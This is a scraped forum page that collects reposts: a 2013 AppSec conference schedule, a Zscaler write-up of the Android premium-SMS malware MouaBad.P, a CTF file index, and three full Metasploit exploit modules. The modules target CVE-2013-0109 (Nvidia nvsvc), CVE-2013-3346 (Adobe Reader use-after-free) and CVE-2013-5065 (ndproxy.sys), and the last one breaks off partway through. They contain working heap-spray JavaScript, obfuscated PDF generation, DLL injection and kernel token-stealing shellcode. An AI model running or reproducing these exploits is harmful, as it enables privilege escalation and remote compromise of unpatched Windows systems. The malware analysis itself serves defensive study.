12:00PM – 12:50PM PANEL: Women in Information Security: Who Are We? Where Are We Going? Moderators: Joan Goodchild Speakers: Dawn-Marie Hutchinson, Valene Skerpac, Carrie Schaper, Gary Phillips
12:00PM – 12:50PM Project Talk: OWASP Testing Guide Speakers: Andrew Mueller, Matteo Meucci
1:00PM – 1:50PM Hack.me: a new way to learn web application security Speakers: Armando Romeo
1:00PM – 1:50PM Hacking Web Server Apps for iOS Speakers: Bruno Oliviera
1:00PM – 1:50PM Open Mic: Vision of the Software Assurance Market (SWAMP)
1:00PM – 1:50PM NIST – Missions and impacts to US industry, economy and citizens Speakers: James St. Pierre, Rick Kuhn
1:00PM – 1:50PM PANEL: Wait Wait… Don’t Pwn Me! Moderators: Mark Miller Speakers: Josh Corman, Chris Eng, Space Rogue, Gal Shpantzer
1:00PM – 1:50PM Project Talk: OWASP Development Guide Speakers: Andrew van der Stock
2:00PM – 2:50PM Buried by time, dust and BeEF Speakers: Michele Orru
2:00PM – 2:50PM Go Fast AND Be Secure: Eliminating Application Risk in the Era of Modern, Component-Based Development Speakers: Jeff Williams, Ryan Berg
2:00PM – 2:50PM Modern Attacks on SSL/TLS: Let the BEAST of CRIME and TIME be not so LUCKY Speakers: Pratik Guha Sarkar, Shawn Fitzgerald
2:00PM – 2:50PM OWASP Broken Web Applications (OWASP BWA): Beyond 1.0 Speakers: Chuck Willis
2:00PM – 2:50PM Open Mic: Practical Cyber Threat Intelligence with STIX Speakers: Sean Barnum
2:00PM – 2:50PM Project Talk: OWASP Security Principles Project Speakers: Dennis Groves
3:00PM – 3:30PM Open Mic: About OWASP Speakers: Sarah Baso, Michael Coates
3:00PM – 3:50PM HTTP Time Bandit Speakers: Vaagn Toukharian
3:00PM – 3:50PM Wassup MOM? Owning the Message Oriented Middleware Speakers: Gursev Singh Kalra
3:00PM – 3:50PM The 2013 OWASP Top 10 Speakers: Dave Wichers
3:00PM – 3:50PM CSRF not all defenses are created equal Speakers: Ari Elias-Bachrach
3:00PM – 3:50PM Project Talk: OWASP Code Review Guide Speakers: Larry Conklin
3:30PM – 4:00PM Bug Bounty – Group Hack Speakers: Tom Brennan, Casey Ellis
4:00PM – 5:00PM Award Ceremony Speakers: Tom Brennan, Peter Dean

Sursa: Presentations | AppSec USA 2013
  20. Dissection of Android malware MouaBad.P

In Zscaler's daily scanning for mobile malware, we came across a sample of Android Mouabad.p. Let's see what is inside.

Application static info:

Package name = com.android.service
Version name = 1.00.11
SDK version: 7
Size: 40 kb

Permissions:

android.permission.INTERNET
android.permission.ACCESS_NETWORK_STATE
android.permission.READ_PHONE_STATE
android.permission.SET_WALLPAPER
android.permission.WRITE_EXTERNAL_STORAGE
android.permission.MOUNT_UNMOUNT_FILESYSTEMS
android.permission.RECEIVE_SMS
android.permission.SEND_SMS
android.permission.RECEIVE_WAP_PUSH
android.permission.READ_PHONE_STATE
android.permission.WRITE_APN_SETTINGS
android.permission.RECEIVE_BOOT_COMPLETED
android.permission.WAKE_LOCK
android.permission.DEVICE_POWER
android.permission.SEND_SMS
android.permission.WRITE_APN_SETTINGS
android.permission.CHANGE_NETWORK_STATE
android.permission.READ_SMS
android.permission.READ_CONTACTS
android.permission.WRITE_CONTACTS
android.permission.CALL_PHONE
android.permission.INTERNE
android.permission.MODIFY_PHONE_STATE

Used features:

android.hardware.telephony
android.hardware.touchscreen

Services:

com.android.service.MessagingService
com.android.service.ListenService

Receivers:

com.android.receiver.PlugScreenRecevier
com.android.receiver.PlugLockRecevier
com.android.receiver.BootReceiver
com.android.receiver.ScreenReceiver

Virustotal scan: https://www.virustotal.com/en/file/1b47265eab3752a7d64a64f570e166a2114e41f559fa468547e6fa917cf64256/analysis/

Now let's dissect the code. This application uses telephony services, as shown in the code as well as in the static analysis, and you can see the use of premium telephone numbers. In this particular screenshot, you can see functions which use phone services to make calls to premium numbers in order to generate revenue: the numbers are controlled by the attackers, who earn a small payment for each call made.
Here you can see that the application is harvesting SIM card information. The application also checks the mobile data and WiFi network status to determine whether Internet connectivity is available. The code includes a hardcoded list of premium telephone numbers, all of which are located in China. In this screenshot you can clearly see that the application also keeps watch on the screen and keyguard status (on/off). This screenshot shows that the application tries to send SMS messages to the premium rate numbers previously seen in the code. Forcing Android applications to initiate calls to premium phone numbers controlled by the attackers is a common revenue generation scheme, particularly in Android applications distributed through third-party app stores. Here you can see various suspicious function names such as call, dial, disableDataConnectivity, get call location, etc. These functions suggest that the application is also trying to keep watch on other phone calls. Functions such as getCallState, endCall, call and cancelMissedCallNotification illustrate that the application tries to control phone call services. The application installs itself silently. Once installed, no icon is observed for this app. Also shown in the previous screenshot is the fact that the application waits for screen and keyguard events before triggering its malicious activity. It does all of this without user intervention, allowing the malware to run without a suspicious icon on the home screen; hiding the icon is just one technique malware authors use to conceal a sample's presence from the device owner. From the above screenshots, you can see that the application uses an XML listener service. Also, in the second screenshot, you can see that the application builds a URL by assembling various strings. This is likely command and control (C&C) communication sent to a master server.
The parameter &imei denotes the harvesting of the phone's IMEI number for tracking the device. In conclusion, this malware defrauds the victim by silently forcing the phone to initiate premium-rate SMS billing to generate revenue, and it may also give the author the ability to monitor or control phone calls.

Reference: https://blog.lookout.com/blog/2013/12/09/mouabad-p-pocket-dialing-for-profit/

Posted by viral

Sursa: Zscaler Research: Dissection of Android malware MouaBad.P
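The beacon described above, a URL assembled from strings plus an &imei parameter, can be sketched as follows. The host, path and parameter names here are entirely hypothetical; the sample's real C&C endpoint is not reproduced:

```ruby
require 'uri'

# Hypothetical reconstruction of how such malware assembles its check-in
# URL from device identifiers. All names below are made up for illustration.
def build_beacon_url(imei, version)
  params = URI.encode_www_form(imei: imei, v: version)
  URI::HTTP.build(host: 'cc.example.com', path: '/report', query: params).to_s
end

url = build_beacon_url('356938035643809', '1.00.11')
puts url # => "http://cc.example.com/report?imei=356938035643809&v=1.00.11"
```

Spotting a device-unique identifier like the IMEI in an outbound query string is a reliable tell that an app is tracking individual handsets for its operator.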
  21. Grehack CTF 2013

MISC/                     16-Nov-2013 03:09
cryptography/             14-Nov-2013 16:21
forensics/                14-Nov-2013 16:21
in_memory_exploitation/   16-Nov-2013 03:36
network/                  16-Nov-2013 03:09
reverse_engineering/      15-Nov-2013 16:52
steganography/            12-Nov-2013 10:58
web/                      16-Nov-2013 03:09

Index of /CTF_2013
  22. [h=1]Nvidia (nvsvc) Display Driver Service Local Privilege Escalation[/h]

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/process'
require 'msf/core/post/windows/reflective_dll_injection'
require 'msf/core/post/windows/services'

class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection
  include Msf::Post::Windows::Services

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
      'Description'    => %q{
        The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user to
        interact with the service. It contains a stacked based buffer overflow as a
        result of a memmove operation. Note the slight spelling differences: the
        executable is 'nvvsvc.exe', the service name is 'nvsvc', and the named pipe is
        'nsvr'. This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011,
        Aug 30 2012, and Dec 1 2012. It has been tested on Windows 7 64-bit against
        nvvsvc.exe dated Dec 1 2012.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Peter Wintersmith', # Original exploit
          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', # Metasploit integration
        ],
      'Arch'           => ARCH_X86_64,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Targets'        =>
        [
          [ 'Windows x64', { } ]
        ],
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true,
          'BadChars'    => "\x00"
        },
      'References'     =>
        [
          [ 'CVE', '2013-0109' ],
          [ 'OSVDB', '88745' ],
          [ 'URL', 'http://nvidia.custhelp.com/app/answers/detail/a_id/3288' ],
        ],
      'DisclosureDate' => 'Dec 25 2012',
      'DefaultTarget'  => 0
    }))
  end

  def check
    vuln_hashes = [
      '43f91595049de14c4b61d1e76436164f',
      '3947ad5d03e6abcce037801162fdb90d',
      '3341d2c91989bc87c3c0baa97c27253b'
    ]

    os = sysinfo["OS"]
    if os =~ /windows/i
      svc = service_info 'nvsvc'
      if svc and svc['Name'] =~ /NVIDIA/i
        vprint_good("Found service '#{svc['Name']}'")

        begin
          if is_running?
            print_good("Service is running")
          else
            print_error("Service is not running!")
          end
        rescue RuntimeError => e
          print_error("Unable to retrieve service status")
        end

        if sysinfo['Architecture'] =~ /WOW64/i
          path = svc['Command'].gsub('"','').strip
          path.gsub!("system32","sysnative")
        else
          path = svc['Command'].gsub('"','').strip
        end

        begin
          hash = client.fs.file.md5(path).unpack('H*').first
        rescue Rex::Post::Meterpreter::RequestError => e
          print_error("Error checking file hash: #{e}")
          return Exploit::CheckCode::Detected
        end

        if vuln_hashes.include?(hash)
          vprint_good("Hash '#{hash}' is listed as vulnerable")
          return Exploit::CheckCode::Vulnerable
        else
          vprint_status("Hash '#{hash}' is not recorded as vulnerable")
          return Exploit::CheckCode::Detected
        end
      else
        return Exploit::CheckCode::Safe
      end
    end
  end

  def is_running?
    begin
      status = service_status('nvsvc')
      return (status and status[:state] == 4)
    rescue RuntimeError => e
      print_error("Unable to retrieve service status")
      return false
    end
  end

  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end

    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
    end

    print_status("Launching notepad to host the exploit...")
    windir = expand_path("%windir%")
    cmd = "#{windir}\\SysWOW64\\notepad.exe"
    process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
    host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
    print_good("Process #{process.pid} launched.")

    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    library_path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2013-0109", "nvidia_nvsvc.x86.dll")
    library_path = ::File.expand_path(library_path)

    print_status("Injecting exploit into #{process.pid} ...")
    exploit_mem, offset = inject_dll_into_process(host_process, library_path)

    print_status("Exploit injected. Injecting payload into #{process.pid}...")
    payload_mem = inject_into_process(host_process, payload.encoded)

    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status("Payload injected. Executing exploit...")
    host_process.thread.create(exploit_mem + offset, payload_mem)

    print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
  end
end

Sursa: http://www.exploit-db.com/exploits/30393/
  23. [h=1]Adobe Reader ToolButton Use After Free[/h]

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'                => "Adobe Reader ToolButton Use After Free",
      'Description'         => %q{
        This module exploits an use after free condition on Adobe Reader versions 11.0.2,
        10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton
        object, where the cEnable callback can be used to early free the object memory.
        Later use of the object allows triggering the use after free condition. This
        module has been tested successfully on Adobe Reader 11.0.2 and 10.0.4, with IE and
        Windows XP SP3, as exploited in the wild in November, 2013. At the moment, this
        module doesn't support Adobe Reader 9 targets; in order to exploit Adobe Reader 9
        the fileformat version of the exploit can be used.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Soroush Dalili', # Vulnerability discovery
          'Unknown', # Exploit in the wild
          'sinn3r', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'References'          =>
        [
          [ 'CVE', '2013-3346' ],
          [ 'OSVDB', '96745' ],
          [ 'ZDI', '13-212' ],
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ],
          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]
        ],
      'Platform'            => 'win',
      'Arch'                => ARCH_X86,
      'Payload'             =>
        {
          'Space'       => 1024,
          'BadChars'    => "\x00",
          'DisableNops' => true
        },
      'BrowserRequirements' =>
        {
          :source    => /script|headers/i,
          :os_name   => Msf::OperatingSystems::WINDOWS,
          :os_flavor => Msf::OperatingSystems::WindowsVersions::XP,
          :ua_name   => Msf::HttpClients::IE
        },
      'Targets'             =>
        [
          [ 'Windows XP / IE / Adobe Reader 10/11', { } ],
        ],
      'Privileged'          => false,
      'DisclosureDate'      => "Aug 08 2013",
      'DefaultTarget'       => 0))
  end

  def on_request_exploit(cli, request, target_info)
    print_status("request: #{request.uri}")
    js_data = make_js(cli, target_info)

    # Create the pdf
    pdf = make_pdf(js_data)

    print_status("Sending PDF...")
    send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })
  end

  def make_js(cli, target_info)
    # CreateFileMappingA + MapViewOfFile + memcpy rop chain
    rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))
    rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))
    escaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info))

    js = %Q|
    function heapSpray(str, str_addr, r_addr) {
      var aaa = unescape("%u0c0c");
      aaa += aaa;
      while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa;
      var i1 = r_addr - 0x24;
      var bbb = aaa.substring(0, i1 / 2);
      var sa = str_addr;
      while (sa.length < (0x0c0c - r_addr)) sa += sa;
      bbb += sa;
      bbb += aaa;
      var i11 = 0x0c0c - 0x24;
      bbb = bbb.substring(0, i11 / 2);
      bbb += str;
      bbb += aaa;
      var i2 = 0x4000 + 0xc000;
      var ccc = bbb.substring(0, i2 / 2);
      while (ccc.length < (0x40000 + 0x40000)) ccc += ccc;
      var i3 = (0x1020 - 0x08) / 2;
      var ddd = ccc.substring(0, 0x80000 - i3);
      var eee = new Array();
      for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s";
      return;
    }

    var shellcode = unescape("#{escaped_payload}");
    var executable = "";
    var rop10 = unescape("#{rop_10}");
    var rop11 = unescape("#{rop_11}");
    var r11 = false;
    var vulnerable = true;
    var obj_size;
    var rop;
    var ret_addr;
    var rop_addr;
    var r_addr;

    if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {
      obj_size = 0x360 + 0x1c;
      rop = rop10;
      rop_addr = unescape("%u08e4%u0c0c");
      r_addr = 0x08e4;
      ret_addr = unescape("%ua8df%u4a82");
    } else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {
      r11 = true;
      obj_size = 0x370;
      rop = rop11;
      rop_addr = unescape("%u08a8%u0c0c");
      r_addr = 0x08a8;
      ret_addr = unescape("%u8003%u4a84");
    } else {
      vulnerable = false;
    }

    if (vulnerable) {
      var payload = rop + shellcode;
      heapSpray(payload, ret_addr, r_addr);

      var part1 = "";
      if (!r11) {
        for (i = 0; i < 0x1c / 2; i++) part1 += unescape("%u4141");
      }
      part1 += rop_addr;
      var part2 = "";
      var part2_len = obj_size - part1.length * 2;
      for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape("%u4141");
      var arr = new Array();

      removeButtonFunc = function () {
        app.removeToolButton({ cName: "evil" });
        for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);
      }

      addButtonFunc = function () {
        app.addToolButton({ cName: "xxx", cExec: "1", cEnable: "removeButtonFunc();" });
      }

      app.addToolButton({ cName: "evil", cExec: "1", cEnable: "addButtonFunc();" });
    }
    |

    js
  end

  def RandomNonASCIIString(count)
    result = ""
    count.times do
      result << (rand(128) + 128).chr
    end
    result
  end

  def ioDef(id)
    "%d 0 obj \n" % id
  end

  def ioRef(id)
    "%d 0 R" % id
  end

  #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
  def nObfu(str)
    #return str
    result = ""
    str.scan(/./u) do |c|
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
        result << "#%x" % c.unpack("C*")[0]
      else
        result << c
      end
    end
    result
  end

  def ASCIIHexWhitespaceEncode(str)
    result = ""
    whitespace = ""
    str.each_byte do |b|
      result << whitespace << "%02x" % b
      whitespace = " " * (rand(3) + 1)
    end
    result << ">"
  end

  def make_pdf(js)
    xref = []
    eol = "\n"
    endobj = "endobj" << eol

    # Randomize PDF version?
    pdf = "%PDF-1.5" << eol
    pdf << "%" << RandomNonASCIIString(4) << eol

    # catalog
    xref << pdf.length
    pdf << ioDef(1) << nObfu("<<") << eol
    pdf << nObfu("/Pages ") << ioRef(2) << eol
    pdf << nObfu("/Type /Catalog") << eol
    pdf << nObfu("/OpenAction ") << ioRef(4) << eol
    # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load
    pdf << nObfu("/AcroForm ") << ioRef(6) << eol
    pdf << nObfu(">>") << eol
    pdf << endobj

    # pages array
    xref << pdf.length
    pdf << ioDef(2) << nObfu("<<") << eol
    pdf << nObfu("/Kids [") << ioRef(3) << "]" << eol
    pdf << nObfu("/Count 1") << eol
    pdf << nObfu("/Type /Pages") << eol
    pdf << nObfu(">>") << eol
    pdf << endobj

    # page 1
    xref << pdf.length
    pdf << ioDef(3) << nObfu("<<") << eol
    pdf << nObfu("/Parent ") << ioRef(2) << eol
    pdf << nObfu("/Type /Page") << eol
    pdf << nObfu(">>") << eol # end obj dict
    pdf << endobj

    # js action
    xref << pdf.length
    pdf << ioDef(4) << nObfu("<<")
    pdf << nObfu("/Type/Action/S/JavaScript/JS ") + ioRef(5)
    pdf << nObfu(">>") << eol
    pdf << endobj

    # js stream
    xref << pdf.length
    compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))
    pdf << ioDef(5) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
    pdf << "stream" << eol
    pdf << compressed << eol
    pdf << "endstream" << eol
    pdf << endobj

    ###
    # The following form related data is required to get icucnv36.dll / icucnv40.dll to load
    ###

    # form object
    xref << pdf.length
    pdf << ioDef(6)
    pdf << nObfu("<</XFA ") << ioRef(7) << nObfu(">>") << eol
    pdf << endobj

    # form stream
    xfa = <<-EOF
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/2.6/">
<present><pdf><interactive>1</interactive></pdf></present>
</config>
<template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
<subform name="form1" layout="tb" locale="en_US">
<pageSet></pageSet>
</subform></template></xdp:xdp>
    EOF

    xref << pdf.length
    pdf << ioDef(7) << nObfu("<</Length %s>>" % xfa.length) << eol
    pdf << "stream" << eol
    pdf << xfa << eol
    pdf << "endstream" << eol
    pdf << endobj

    ###
    # end form stuff for icucnv36.dll / icucnv40.dll
    ###

    # trailing stuff
    xrefPosition = pdf.length
    pdf << "xref" << eol
    pdf << "0 %d" % (xref.length + 1) << eol
    pdf << "0000000000 65535 f" << eol
    xref.each do |index|
      pdf << "%010d 00000 n" % index << eol
    end

    pdf << "trailer" << eol
    pdf << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol
    pdf << "startxref" << eol
    pdf << xrefPosition.to_s() << eol
    pdf << "%%EOF" << eol

    pdf
  end
end

=begin
* crash Adobe Reader 10.1.4

First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001
eip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213
AcroRd32_60000000!PDFLTerm+0xbb7cd:
604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=????????

* crash Adobe Reader 11.0.2

(940.d70): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll -
eax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000
eip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213
AcroRd32_60000000!DllCanUnloadNow+0x1493ae:
60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=????????
=end

Sursa: http://www.exploit-db.com/exploits/30394/
  24. [h=1]Microsoft Windows ndproxy.sys Local Privilege Escalation[/h] ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process def initialize(info={}) super(update_info(info, { 'Name' => 'Microsoft Windows ndproxy.sys Local Privilege Escalation', 'Description' => %q{ This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003 SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used to access an array unsafely, and the value is used to perform a call, leading to a NULL pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to work the service "Routing and Remote Access" must be running on the target system. 
}, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability discovery 'ryujin', # python PoC 'Shahin Ramezany', # C PoC 'juan vazquez' # MSF module ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Automatic', { } ], [ 'Windows XP SP3', { 'HaliQuerySystemInfo' => 0x16bba, # Stable over Windows XP SP3 updates '_KPROCESS' => "\x44", # Offset to _KPROCESS from a _ETHREAD struct '_TOKEN' => "\xc8", # Offset to TOKEN from the _EPROCESS struct '_UPID' => "\x84", # Offset to UniqueProcessId FROM the _EPROCESS struct '_APLINKS' => "\x88" # Offset to ActiveProcessLinks _EPROCESS struct } ], [ 'Windows Server 2003 SP2', { 'HaliQuerySystemInfo' => 0x1fa1e, '_KPROCESS' => "\x38", '_TOKEN' => "\xd8", '_UPID' => "\x94", '_APLINKS' => "\x98" } ] ], 'References' => [ [ 'CVE', '2013-5065' ], [ 'OSVDB' , '100368'], [ 'BID', '63971' ], [ 'EDB', '30014' ], [ 'URL', 'http://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/' ], [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2914486'], [ 'URL', 'https://github.com/ShahinRamezany/Codes/blob/master/CVE-2013-5065/CVE-2013-5065.cpp' ], [ 'URL', 'http://www.secniu.com/blog/?p=53' ], [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ], [ 'URL', 'http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html' ] ], 'DisclosureDate'=> 'Nov 27 2013', 'DefaultTarget' => 0 })) end def add_railgun_functions session.railgun.add_function( 'ntdll', 'NtAllocateVirtualMemory', 'DWORD', [ ["DWORD", "ProcessHandle", "in"], ["PBLOB", "BaseAddress", "inout"], ["PDWORD", "ZeroBits", "in"], ["PBLOB", "RegionSize", "inout"], ["DWORD", "AllocationType", "in"], ["DWORD", "Protect", "in"] ]) 
    session.railgun.add_function(
      'ntdll',
      'NtDeviceIoControlFile',
      'DWORD',
      [
        [ "DWORD", "FileHandle", "in" ],
        [ "DWORD", "Event", "in" ],
        [ "DWORD", "ApcRoutine", "in" ],
        [ "DWORD", "ApcContext", "in" ],
        [ "PDWORD", "IoStatusBlock", "out" ],
        [ "DWORD", "IoControlCode", "in" ],
        [ "LPVOID", "InputBuffer", "in" ],
        [ "DWORD", "InputBufferLength", "in" ],
        [ "LPVOID", "OutputBuffer", "in" ],
        [ "DWORD", "OutPutBufferLength", "in" ]
      ])

    session.railgun.add_function(
      'ntdll',
      'NtQueryIntervalProfile',
      'DWORD',
      [
        [ "DWORD", "ProfileSource", "in" ],
        [ "PDWORD", "Interval", "out" ]
      ])

    session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')

    session.railgun.add_function(
      'psapi',
      'EnumDeviceDrivers',
      'BOOL',
      [
        ["PBLOB", "lpImageBase", "out"],
        ["DWORD", "cb", "in"],
        ["PDWORD", "lpcbNeeded", "out"]
      ])

    session.railgun.add_function(
      'psapi',
      'GetDeviceDriverBaseNameA',
      'DWORD',
      [
        ["LPVOID", "ImageBase", "in"],
        ["PBLOB", "lpBaseName", "out"],
        ["DWORD", "nSize", "in"]
      ])
  end

  def open_device(dev)
    invalid_handle_value = 0xFFFFFFFF
    r = session.railgun.kernel32.CreateFileA(dev, 0x0, 0x0, nil, 0x3, 0, 0)
    handle = r['return']
    if handle == invalid_handle_value
      return nil
    end
    return handle
  end

  def find_sys_base(drvname)
    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")

    addresses.each do |address|
      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
      current_drvname = results['lpBaseName'][0..results['return'] - 1]
      if drvname == nil
        if current_drvname.downcase.include?('krnl')
          return [address, current_drvname]
        end
      elsif drvname == results['lpBaseName'][0..results['return'] - 1]
        return [address, current_drvname]
      end
    end

    return nil
  end

  def ring0_shellcode(t)
    restore_ptrs = "\x31\xc0"                                                # xor eax, eax
    restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack("L") # mov eax, offset hal!HaliQuerySystemInformation
    restore_ptrs << "\xa3" + [
      @addresses["halDispatchTable"] + 4 ].pack("L")                        # mov dword ptr [nt!HalDispatchTable+0x4], eax

    tokenstealing = "\x52"                                                  # push edx                          # Save edx on the stack
    tokenstealing << "\x53"                                                 # push ebx                          # Save ebx on the stack
    tokenstealing << "\x33\xc0"                                             # xor eax, eax                      # eax = 0
    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"                         # mov eax, dword ptr fs:[eax+124h]  # Retrieve ETHREAD
    tokenstealing << "\x8b\x40" + t['_KPROCESS']                            # mov eax, dword ptr [eax+44h]      # Retrieve _KPROCESS
    tokenstealing << "\x8b\xc8"                                             # mov ecx, eax
    tokenstealing << "\x8b\x98" + t['_TOKEN'] + "\x00\x00\x00"              # mov ebx, dword ptr [eax+0C8h]     # Retrieves TOKEN
    tokenstealing << "\x8b\x80" + t['_APLINKS'] + "\x00\x00\x00"            # mov eax, dword ptr [eax+88h] <==| # Retrieve FLINK from ActiveProcessLinks
    tokenstealing << "\x81\xe8" + t['_APLINKS'] + "\x00\x00\x00"            # sub eax, 88h                    | # Retrieve _EPROCESS pointer from the ActiveProcessLinks
    tokenstealing << "\x81\xb8" + t['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4    | # Compares UniqueProcessId with 4 (the System process on Windows XP)
    tokenstealing << "\x75\xe8"                                             # jne 0000101e ====================
    tokenstealing << "\x8b\x90" + t['_TOKEN'] + "\x00\x00\x00"              # mov edx, dword ptr [eax+0C8h]     # Retrieves TOKEN and stores it in EDX
    tokenstealing << "\x8b\xc1"                                             # mov eax, ecx                      # Retrieves KPROCESS stored in ECX
    tokenstealing << "\x89\x90" + t['_TOKEN'] + "\x00\x00\x00"              # mov dword ptr [eax+0C8h], edx     # Overwrites the TOKEN for the current KPROCESS
    tokenstealing << "\x5b"                                                 # pop ebx                           # Restores ebx
    tokenstealing << "\x5a"                                                 # pop edx                           # Restores edx
    tokenstealing << "\xc2\x10"                                             # ret 10h                           # Away from the kernel!
    ring0_shellcode = restore_ptrs + tokenstealing
    return ring0_shellcode
  end

  def fill_memory(proc, address, length, content)
    result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")

    unless proc.memory.writable?(address)
      vprint_error("Failed to allocate memory")
      return nil
    end
    vprint_good("#{address} is now writable")

    result = proc.memory.write(address, content)
    if result.nil?
      vprint_error("Failed to write contents to memory")
      return nil
    else
      vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
    end

    return address
  end

  def create_proc
    windir = expand_path("%windir%")
    cmd = "#{windir}\\System32\\notepad.exe"

    # run hidden
    begin
      proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
    rescue Rex::Post::Meterpreter::RequestError
      # when running from the Adobe Reader sandbox:
      # Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
      return nil
    end
    return proc.pid
  end

  def disclose_addresses(t)
    addresses = {}

    vprint_status("Getting the Kernel module name...")
    kernel_info = find_sys_base(nil)
    if kernel_info.nil?
      vprint_error("Failed to disclose the Kernel module name")
      return nil
    end
